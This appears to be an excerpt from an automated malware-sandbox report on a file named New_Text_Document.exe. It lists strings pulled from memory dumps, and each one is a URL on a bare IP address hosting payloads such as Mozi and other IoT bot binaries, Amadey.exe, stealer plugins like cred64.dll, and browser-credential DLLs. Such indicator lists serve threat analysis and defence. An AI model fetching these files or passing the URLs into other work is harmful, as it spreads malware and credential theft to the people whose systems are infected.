                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.51.5/cundi.ppc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.51.5/cundi.sh4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.51.5/cundi.x86
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://84.54.51.5/cundi.x86_64
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.105.8.9:12118/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.113.49.80:7662/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.130.181.212:24501/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.130.184.207:13208/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.130.188.129:19166/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.130.196.83:37133/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.196.178.238:60146/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.209.11.199/b9djs2g/Plugins/clip64.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.209.11.199/b9djs2g/Plugins/cred64.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.217.144.143/files/1un.config.CfgEncFile
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.217.144.143/files/2UN.config.CfgEncFile
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.217.144.143/files/Amadey.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.217.144.143/files/Min.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.217.144.143/files/Min1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.217.144.143/files/My2.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.217.144.143/files/RBY2.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.217.144.143/files/source2.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.239.33.32/mperl
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.64.129.89:42080/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.97.111.84:32620/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.97.130.227:25117/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.34.49.160:42269/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://86.6.187.44:9404/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.110.12.226:24287/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.13.235.35:28944/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.236.82.113:10001/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.242.25.2:36639/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.251.64.205/packages/Jrxpomjaswp.dat
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.26.110.70:3803/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.26.14.209:29147/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.26.181.132:25500/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.69.116.10:33107/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.100.255.247:34851/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.119.87.161:55930/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.149.232.253:6981/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.225.222.128:14802/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.247.222.82:8272/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.250.19.224:9267/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.250.240.245:13340/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.90.79.166:45241/bin.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://88.90.79.166:45241/i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.113.5.29:33977/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.135.142.235:11226/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.143.135.185:42324/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.165.6.139:11204/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.165.64.193:26666/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.17.225.21:59549/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.189.184.225:64990/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.190.156.145/Aqua.arm4
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.190.156.145/Aqua.arm7
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.215.188.163:41800/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.98.212/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.98.212/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.98.212/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.98.212/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.98.212/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.98.212/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.23.98.212/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.25.223.211/logfiles/U2O/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.253.188.101:51847/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.29.241.170:34129/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.40.247.219:6476/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://89.45.182.152:6906/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.169.46.125:5459/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.176.171.4:7682/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.213.136.109:63739/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.3.181.57:34666/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.3.186.159:39964/.i
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.63.155.1:33331/Mozi.a
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.63.155.1:33331/Mozi.m
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://90.63.157.209:27997/.i
